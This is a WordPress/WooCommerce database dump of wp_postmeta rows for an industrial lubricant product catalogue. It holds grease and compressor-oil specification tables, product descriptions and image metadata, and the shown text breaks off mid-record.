INSERT INTO `wp_postmeta` VALUES (15949, 1646, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (15950, 1646, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (15951, 1646, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (15952, 1646, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (15953, 1646, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (15954, 1646, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (15955, 1646, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (15956, 1646, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (15957, 1646, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (15958, 1646, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (15959, 1646, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (15960, 1646, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (15961, 1646, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (15962, 1646, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (15963, 1646, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (15964, 1646, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (15965, 1646, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (15966, 1646, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (15967, 1646, '_product_version', '2.6.4'); 
INSERT INTO `wp_postmeta` VALUES (15968, 1646, '_product_image_gallery', ''); 
INSERT INTO `wp_postmeta` VALUES (15969, 1646, '_ywtm_hide_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (15970, 1646, '_ywtm_override_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (15971, 1646, '_ywtm_priority_tab_description', '1'); 
INSERT INTO `wp_postmeta` VALUES (15972, 1646, '_ywtm_title_tab_description', 'Description'); 
INSERT INTO `wp_postmeta` VALUES (15973, 1646, '_ywtm_content_tab_description', '<strong>Rotary Compressors</strong>\r\nIn rotary compressor applications, these oils increase air/oil separator life indefinitely, and extend rotary oil drain intervals up to 5,000 and 8,000 hours. Their low oil volatility ratings mean less make-up oil due to evaporation.\r\n\r\n<strong>Reciprocating Compressors</strong>\r\n216X Series of oils can reduce upper cylinder operating temperatures by as much as 40˚F/4˚C, reduce cylinder oil feed rates by as much as 40%, extend crankcase oil drain intervals by as much as 10 times, and extend valve and part life indefinitely.\r\n\r\n<strong>Compatibility</strong>\r\nThey are compatible with all known gasket and seal materials and are nonreactive with materials found downstream, such as polycarbonate bowls, elastomers and paints. These lubricants should be used exclusively and should not be mixed or dilutedwith existing product'); 
INSERT INTO `wp_postmeta` VALUES (16000, 1646, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (16001, 1646, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (16002, 1647, '_edit_lock', '1482345211:2'); 
INSERT INTO `wp_postmeta` VALUES (16003, 1647, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (16004, 1647, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (16005, 1647, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (16006, 1647, '312_default_editor', '<table width="939">\r\n<tbody>\r\n<tr>\r\n<td style="text-align: left;" width="219">Product</td>\r\n<td style="text-align: center;" width="180"><strong>2210G</strong></td>\r\n<td style="text-align: center;" width="180"><strong>2211G</strong></td>\r\n<td style="text-align: center;" width="180"><strong>2212G</strong></td>\r\n<td style="text-align: center;" width="180"><strong>2213G</strong></td>\r\n</tr>\r\n<tr>\r\n<td>NLGI</td>\r\n<td style="text-align: center;">2</td>\r\n<td style="text-align: center;">2</td>\r\n<td style="text-align: center;">2</td>\r\n<td style="text-align: center;">2</td>\r\n</tr>\r\n<tr>\r\n<td>Work Penetration @ 77°F</td>\r\n<td style="text-align: center;">270-290</td>\r\n<td style="text-align: center;">270-290</td>\r\n<td style="text-align: center;">270-290</td>\r\n<td style="text-align: center;">270-290</td>\r\n</tr>\r\n<tr>\r\n<td>Base Oil Viscosity</td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td>cSt @ 40°C</td>\r\n<td style="text-align: center;">193</td>\r\n<td style="text-align: center;">165</td>\r\n<td style="text-align: center;">262</td>\r\n<td style="text-align: center;">162</td>\r\n</tr>\r\n<tr>\r\n<td>cSt @ 100°C</td>\r\n<td style="text-align: center;">19.9</td>\r\n<td style="text-align: center;">17.5</td>\r\n<td style="text-align: center;">24</td>\r\n<td style="text-align: center;">17.5</td>\r\n</tr>\r\n<tr>\r\n<td>SUS @ 100°F</td>\r\n<td style="text-align: center;">894</td>\r\n<td style="text-align: center;">764</td>\r\n<td style="text-align: center;">1214</td>\r\n<td style="text-align: center;">750</td>\r\n</tr>\r\n<tr>\r\n<td>SUS @ 210°F</td>\r\n<td style="text-align: center;">98</td>\r\n<td style="text-align: center;">88</td>\r\n<td style="text-align: center;">116</td>\r\n<td style="text-align: center;">88</td>\r\n</tr>\r\n<tr>\r\n<td>Color</td>\r\n<td style="text-align: center;">Amber</td>\r\n<td style="text-align: center;">Red</td>\r\n<td style="text-align: center;">Gray</td>\r\n<td style="text-align: center;">Tan</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;">Solids</td>\r\n<td style="text-align: center;">-</td>\r\n<td style="text-align: center;">-</td>\r\n<td style="text-align: center;">MoS2</td>\r\n<td style="text-align: center;">-</td>\r\n</tr>\r\n<tr>\r\n<td>Thickener</td>\r\n<td style="text-align: center;">Inorganic</td>\r\n<td style="text-align: center;">Lithium Complex</td>\r\n<td style="text-align: center;">Aluminum Complex</td>\r\n<td style="text-align: center;">Calcium Sulfonate</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;">Drop Point °F</td>\r\n<td style="text-align: center;">None</td>\r\n<td style="text-align: center;">600</td>\r\n<td style="text-align: center;">525</td>\r\n<td style="text-align: center;">575</td>\r\n</tr>\r\n<tr>\r\n<td>Timken Load Wear Test OK Load, kg/lbs</td>\r\n<td style="text-align: center;">35</td>\r\n<td style="text-align: center;">30</td>\r\n<td style="text-align: center;">34</td>\r\n<td style="text-align: center;">34</td>\r\n</tr>\r\n<tr>\r\n<td>Water Resistance</td>\r\n<td style="text-align: center;">Satisfactory</td>\r\n<td style="text-align: center;">Excellent</td>\r\n<td style="text-align: center;">Excellent</td>\r\n<td style="text-align: center;">Excellent</td>\r\n</tr>\r\n<tr>\r\n<td>Operating Range °F</td>\r\n<td style="text-align: center;">-10-375</td>\r\n<td style="text-align: center;">-30-325</td>\r\n<td style="text-align: center;">-10-350</td>\r\n<td style="text-align: center;">-30-425</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (16007, 1647, '1367_default_editor', '<strong>2210G</strong>\r\n\r\nThis grease has high quality fluids with an inorganic thickener to produce excellent temperature stability.\r\n\r\nAdvantages:\r\n<ul>\r\n 	<li>Extends Lube Cycles</li>\r\n 	<li>Extends Bearing and Shaft Life</li>\r\n 	<li>Good for All Bearing Designs</li>\r\n</ul>\r\n<strong>2211G</strong>\r\n\r\nThis high temperature grease is formulated for universal multi-purpose use. This lithium complex based grease has an exceptionally high drop point and excellent cold weather pumpability making it desirable for multi-purpose applications. Its texture is tacky-fibrous to resist the wiping and squeezing actions present in plain bearings, bushing and sleeves.\r\n\r\nAdvantages:\r\n<ul>\r\n 	<li>High Temperature Protection</li>\r\n 	<li>Shear Stability</li>\r\n 	<li>Water and Steam Resistant</li>\r\n 	<li>Extreme Pressure and Wear</li>\r\n 	<li>Elevated Temperature Protection</li>\r\n</ul>\r\n<strong>2212G</strong>\r\n\r\nThis grease is a combination of synthetic fluids, high viscosity base oils, and special additives including a friction reducing\r\nmolybdenum disulfide (MoS2) package.\r\n\r\nAdvantages:\r\n<ul>\r\n 	<li>Impervious to Water and Steam Washout</li>\r\n 	<li>Drop point Over 500˚F/260˚C</li>\r\n 	<li>Resistant to mild chemicals; acids, alkalines, detergents, soaps</li>\r\n 	<li>Extreme Pressure and Anti-Wear Protection</li>\r\n 	<li>Extends Equipment Life</li>\r\n</ul>\r\n<strong>2213G</strong>\r\n\r\nThis grease contains a Calcium Sulfonate base that provides inherent extreme pressure properties and unequaled protection against water, moisture, condensation, rust and corrosion attacks. It has exceptional oxidation and mechanical stability. The high drop point assures superior protection at continuous, elevated temperatures. It contains no heavy metals and has excellent compatibility with other greases.\r\n\r\nAdvantages:\r\n<ul>\r\n 	<li>Excellent Rust and Corrosion Protection</li>\r\n 	<li>High Drop Point</li>\r\n 	<li>Water Resistant</li>\r\n 	<li>Excellent in Corrosive Environments</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (16008, 1647, '716_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (16009, 1647, '719_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (16010, 1647, '317_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (16011, 1647, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (16012, 1647, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (16013, 1647, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (16014, 1647, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (16015, 1647, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (16016, 1647, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (16017, 1647, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (16018, 1647, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (16019, 1647, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (16020, 1647, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (16021, 1647, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (16022, 1647, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (16023, 1647, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (16024, 1647, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (16025, 1647, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (16026, 1647, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (16027, 1647, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (16028, 1647, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (16029, 1647, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (16030, 1647, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (16031, 1647, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (16032, 1647, '_product_version', '2.6.4'); 
INSERT INTO `wp_postmeta` VALUES (16033, 1647, '_product_image_gallery', ''); 
INSERT INTO `wp_postmeta` VALUES (16034, 1647, '_ywtm_hide_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (16035, 1647, '_ywtm_override_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (16036, 1647, '_ywtm_priority_tab_description', '1'); 
INSERT INTO `wp_postmeta` VALUES (16037, 1647, '_ywtm_title_tab_description', 'Description'); 
INSERT INTO `wp_postmeta` VALUES (16038, 1647, '_ywtm_content_tab_description', '<strong>Rotary Compressors</strong>\r\nIn rotary compressor applications, these oils increase air/oil separator life indefinitely, and extend rotary oil drain intervals up to 5,000 and 8,000 hours. Their low oil volatility ratings mean less make-up oil due to evaporation.\r\n\r\n<strong>Reciprocating Compressors</strong>\r\n216X Series of oils can reduce upper cylinder operating temperatures by as much as 40˚F/4˚C, reduce cylinder oil feed rates by as much as 40%, extend crankcase oil drain intervals by as much as 10 times, and extend valve and part life indefinitely.\r\n\r\n<strong>Compatibility</strong>\r\nThey are compatible with all known gasket and seal materials and are nonreactive with materials found downstream, such as polycarbonate bowls, elastomers and paints. These lubricants should be used exclusively and should not be mixed or dilutedwith existing product'); 
INSERT INTO `wp_postmeta` VALUES (16065, 1647, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (16066, 1647, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (16067, 1648, '_edit_lock', '1482345623:2'); 
INSERT INTO `wp_postmeta` VALUES (16068, 1648, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (16069, 1648, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (16070, 1648, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (16071, 1648, '312_default_editor', '<table width="759">\r\n<tbody>\r\n<tr>\r\n<td style="text-align: left;" width="219">Product</td>\r\n<td style="text-align: center;" width="180"><strong>2220G</strong></td>\r\n<td style="text-align: center;" width="180"><strong>2221G</strong></td>\r\n<td style="text-align: center;" width="180"><strong>2222G</strong></td>\r\n</tr>\r\n<tr>\r\n<td>NLGI</td>\r\n<td style="text-align: center;">2</td>\r\n<td style="text-align: center;">2</td>\r\n<td style="text-align: center;">2</td>\r\n</tr>\r\n<tr>\r\n<td>Work Penetration @ 77°F</td>\r\n<td style="text-align: center;">270-290</td>\r\n<td style="text-align: center;">270-290</td>\r\n<td style="text-align: center;">270-290</td>\r\n</tr>\r\n<tr>\r\n<td>Base Oil Viscosity</td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;">cSt @ 40°C</td>\r\n<td style="text-align: center;">70</td>\r\n<td style="text-align: center;">162</td>\r\n<td style="text-align: center;">604</td>\r\n</tr>\r\n<tr>\r\n<td>cSt @ 100°C</td>\r\n<td style="text-align: center;">10.6</td>\r\n<td style="text-align: center;">18.7</td>\r\n<td style="text-align: center;">48</td>\r\n</tr>\r\n<tr>\r\n<td>SUS @ 100°F</td>\r\n<td style="text-align: center;">325</td>\r\n<td style="text-align: center;">750</td>\r\n<td style="text-align: center;">2800</td>\r\n</tr>\r\n<tr>\r\n<td>SUS @ 210°F</td>\r\n<td style="text-align: center;">61</td>\r\n<td style="text-align: center;">93</td>\r\n<td style="text-align: center;">216</td>\r\n</tr>\r\n<tr>\r\n<td>Color</td>\r\n<td style="text-align: center;">Amber</td>\r\n<td style="text-align: center;">Black</td>\r\n<td style="text-align: center;">Red</td>\r\n</tr>\r\n<tr>\r\n<td>Solids</td>\r\n<td style="text-align: center;">-</td>\r\n<td style="text-align: center;">Graphite</td>\r\n<td style="text-align: center;">-</td>\r\n</tr>\r\n<tr>\r\n<td>Thickener</td>\r\n<td style="text-align: center;">Inorganic</td>\r\n<td style="text-align: center;">Inorganic</td>\r\n<td style="text-align: center;">Inorganic</td>\r\n</tr>\r\n<tr>\r\n<td>Drop Point °F</td>\r\n<td style="text-align: center;">None</td>\r\n<td style="text-align: center;">None</td>\r\n<td style="text-align: center;">None</td>\r\n</tr>\r\n<tr>\r\n<td>Timken Load Wear Test OK Load, kg/lbs</td>\r\n<td style="text-align: center;">32/70</td>\r\n<td style="text-align: center;">32/70</td>\r\n<td style="text-align: center;">23/50</td>\r\n</tr>\r\n<tr>\r\n<td>Operating Range °F</td>\r\n<td style="text-align: center;">-25-600</td>\r\n<td style="text-align: center;">-30-525</td>\r\n<td style="text-align: center;">-20-500</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (16072, 1648, '1367_default_editor', '<strong>2220G</strong>\r\n\r\nThis grease has a non-drip feature that makes it desirable for high speeds and temperatures. It is made from a combination of an ashless, inorganic thickener and a blend of synthetic base fluids which were originally developed for jet aircraft use.\r\n\r\nAdvantages\r\n<ul>\r\n 	<li>High Speed</li>\r\n 	<li>Non-Carbonizing</li>\r\n 	<li>Cleans as it Lubricates</li>\r\n</ul>\r\n<strong>2221G</strong>\r\n\r\nThis grease has a combination of medium viscosity synthetic base oils, anti-wear additives and high temperature solids. It is formulated to handle the mid to high ranges of speed and temperature. Exceptional resistance to heat and moisture and ideal for applications where drippage cannot be tolerated.\r\n\r\nAdvantages\r\n<ul>\r\n 	<li>Controlled Volatility Extends Lube Cycles</li>\r\n 	<li>Medium to High Speeds</li>\r\n 	<li>Plain, Journal and Anti-Friction Bearings</li>\r\n 	<li>Lubricating Solids</li>\r\n</ul>\r\n<strong>2222G</strong>\r\n\r\nThis grease contains high viscosity synthetic base fluids with an ashless inorganic thickener which is designed for high\r\ntemperature-sealed-for-life bearings. It has exceptional in oven and tenter frame bearing usage where temperatures\r\nconstantly exceed 350˚F/177˚C.\r\n\r\nAdvantages\r\n<ul>\r\n 	<li>Red Color for Easy Identification</li>\r\n 	<li>Slow to Medium Speeds</li>\r\n 	<li>Extended Lube Cycles</li>\r\n 	<li>Extends Both Bearing and Shaft Life</li>\r\n 	<li>Low Base Oil Volatility</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (16073, 1648, '716_default_editor', '<ul>\r\n 	<li>Bearings</li>\r\n 	<li>Rollers</li>\r\n 	<li>Seals</li>\r\n 	<li>Gaskets</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (16074, 1648, '719_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (16075, 1648, '317_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (16076, 1648, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (16077, 1648, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (16078, 1648, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (16079, 1648, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (16080, 1648, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (16081, 1648, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (16082, 1648, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (16083, 1648, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (16084, 1648, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (16085, 1648, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (16086, 1648, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (16087, 1648, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (16088, 1648, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (16089, 1648, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (16090, 1648, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (16091, 1648, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (16092, 1648, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (16093, 1648, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (16094, 1648, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (16095, 1648, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (16096, 1648, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (16097, 1648, '_product_version', '2.6.4'); 
INSERT INTO `wp_postmeta` VALUES (16098, 1648, '_product_image_gallery', ''); 
INSERT INTO `wp_postmeta` VALUES (16099, 1648, '_ywtm_hide_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (16100, 1648, '_ywtm_override_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (16101, 1648, '_ywtm_priority_tab_description', '1'); 
INSERT INTO `wp_postmeta` VALUES (16102, 1648, '_ywtm_title_tab_description', 'Description'); 
INSERT INTO `wp_postmeta` VALUES (16103, 1648, '_ywtm_content_tab_description', '<strong>Rotary Compressors</strong>\r\nIn rotary compressor applications, these oils increase air/oil separator life indefinitely, and extend rotary oil drain intervals up to 5,000 and 8,000 hours. Their low oil volatility ratings mean less make-up oil due to evaporation.\r\n\r\n<strong>Reciprocating Compressors</strong>\r\n216X Series of oils can reduce upper cylinder operating temperatures by as much as 40˚F/4˚C, reduce cylinder oil feed rates by as much as 40%, extend crankcase oil drain intervals by as much as 10 times, and extend valve and part life indefinitely.\r\n\r\n<strong>Compatibility</strong>\r\nThey are compatible with all known gasket and seal materials and are nonreactive with materials found downstream, such as polycarbonate bowls, elastomers and paints. These lubricants should be used exclusively and should not be mixed or dilutedwith existing product'); 
INSERT INTO `wp_postmeta` VALUES (16130, 1648, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (16131, 1648, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (16132, 1649, '_edit_lock', '1482345651:2'); 
INSERT INTO `wp_postmeta` VALUES (16133, 1649, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (16134, 1649, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (16135, 1649, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (16136, 1649, '312_default_editor', '<table width="939">\r\n<tbody>\r\n<tr>\r\n<td width="219">Product</td>\r\n<td style="text-align: center;" width="180"><strong>2230FG</strong></td>\r\n<td style="text-align: center;" width="180"><strong>2231FG</strong></td>\r\n<td style="text-align: center;" width="180"><strong>2232FG</strong></td>\r\n<td style="text-align: center;" width="180"><strong>2233FG</strong></td>\r\n</tr>\r\n<tr>\r\n<td>NLGI</td>\r\n<td style="text-align: center;">2</td>\r\n<td style="text-align: center;">2</td>\r\n<td style="text-align: center;">2</td>\r\n<td style="text-align: center;">2</td>\r\n</tr>\r\n<tr>\r\n<td>Work Penetration @ 77°F</td>\r\n<td style="text-align: center;">270-290</td>\r\n<td style="text-align: center;">270-290</td>\r\n<td style="text-align: center;">270-290</td>\r\n<td style="text-align: center;">270-290</td>\r\n</tr>\r\n<tr>\r\n<td>Base Oil Viscosity SUS (cSt)</td>\r\n<td style="text-align: center;">485 (105)</td>\r\n<td style="text-align: center;">750 (162)</td>\r\n<td style="text-align: center;">469 (101)</td>\r\n<td style="text-align: center;">579 (125)</td>\r\n</tr>\r\n<tr>\r\n<td>Color</td>\r\n<td style="text-align: center;">Clear</td>\r\n<td style="text-align: center;">Clear</td>\r\n<td style="text-align: center;">Clear</td>\r\n<td style="text-align: center;">Tan</td>\r\n</tr>\r\n<tr>\r\n<td>Solids</td>\r\n<td style="text-align: center;">-</td>\r\n<td style="text-align: center;">-</td>\r\n<td style="text-align: center;">-</td>\r\n<td style="text-align: center;">-</td>\r\n</tr>\r\n<tr>\r\n<td>Thickener</td>\r\n<td style="text-align: center;">Inorganic</td>\r\n<td style="text-align: center;">Aluminum Complex</td>\r\n<td style="text-align: center;">Inorganic</td>\r\n<td style="text-align: center;">Calcium Sulfonate</td>\r\n</tr>\r\n<tr>\r\n<td>Drop Point °F</td>\r\n<td style="text-align: center;">None</td>\r\n<td style="text-align: center;">525</td>\r\n<td style="text-align: center;">None</td>\r\n<td style="text-align: center;">575</td>\r\n</tr>\r\n<tr>\r\n<td>Water Resistance</td>\r\n<td style="text-align: center;">Very Good</td>\r\n<td style="text-align: center;">Excellent</td>\r\n<td style="text-align: center;">Very Good</td>\r\n<td style="text-align: center;">Excellent</td>\r\n</tr>\r\n<tr>\r\n<td>Operating Range °F</td>\r\n<td style="text-align: center;">-10-325</td>\r\n<td style="text-align: center;">-15-365</td>\r\n<td style="text-align: center;">-54-450</td>\r\n<td style="text-align: center;">-40-425</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (16137, 1649, '1367_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (16138, 1649, '716_default_editor', '<ul>\r\n 	<li>Bearings</li>\r\n 	<li>Rollers</li>\r\n 	<li>Seals</li>\r\n 	<li>Gaskets</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (16139, 1649, '719_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (16140, 1649, '317_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (16141, 1649, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (16142, 1649, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (16143, 1649, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (16144, 1649, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (16145, 1649, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (16146, 1649, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (16147, 1649, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (16148, 1649, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (16149, 1649, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (16150, 1649, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (16151, 1649, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (16152, 1649, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (16153, 1649, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (16154, 1649, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (16155, 1649, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (16156, 1649, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (16157, 1649, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (16158, 1649, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (16159, 1649, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (16160, 1649, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (16161, 1649, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (16162, 1649, '_product_version', '2.6.4'); 
INSERT INTO `wp_postmeta` VALUES (16163, 1649, '_product_image_gallery', ''); 
INSERT INTO `wp_postmeta` VALUES (16164, 1649, '_ywtm_hide_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (16165, 1649, '_ywtm_override_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (16166, 1649, '_ywtm_priority_tab_description', '1'); 
INSERT INTO `wp_postmeta` VALUES (16167, 1649, '_ywtm_title_tab_description', 'Description'); 
INSERT INTO `wp_postmeta` VALUES (16168, 1649, '_ywtm_content_tab_description', '<strong>Rotary Compressors</strong>\r\nIn rotary compressor applications, these oils increase air/oil separator life indefinitely, and extend rotary oil drain intervals up to 5,000 and 8,000 hours. Their low oil volatility ratings mean less make-up oil due to evaporation.\r\n\r\n<strong>Reciprocating Compressors</strong>\r\n216X Series of oils can reduce upper cylinder operating temperatures by as much as 40˚F/4˚C, reduce cylinder oil feed rates by as much as 40%, extend crankcase oil drain intervals by as much as 10 times, and extend valve and part life indefinitely.\r\n\r\n<strong>Compatibility</strong>\r\nThey are compatible with all known gasket and seal materials and are nonreactive with materials found downstream, such as polycarbonate bowls, elastomers and paints. These lubricants should be used exclusively and should not be mixed or dilutedwith existing product'); 
INSERT INTO `wp_postmeta` VALUES (16195, 1649, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (16196, 1649, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (16197, 1650, '_wp_attached_file', '2016/09/tribosys-general-purpose-oil.jpg'); 
INSERT INTO `wp_postmeta` VALUES (16198, 1650, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:4752;s:6:"height";i:3168;s:4:"file";s:40:"2016/09/tribosys-general-purpose-oil.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:40:"tribosys-general-purpose-oil-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:40:"tribosys-general-purpose-oil-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:40:"tribosys-general-purpose-oil-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:42:"tribosys-general-purpose-oil-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:40:"tribosys-general-purpose-oil-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:40:"tribosys-general-purpose-oil-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:40:"tribosys-general-purpose-oil-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:40:"tribosys-general-purpose-oil-510x600.jpg";s:5:"width";i:510;s:6:"hei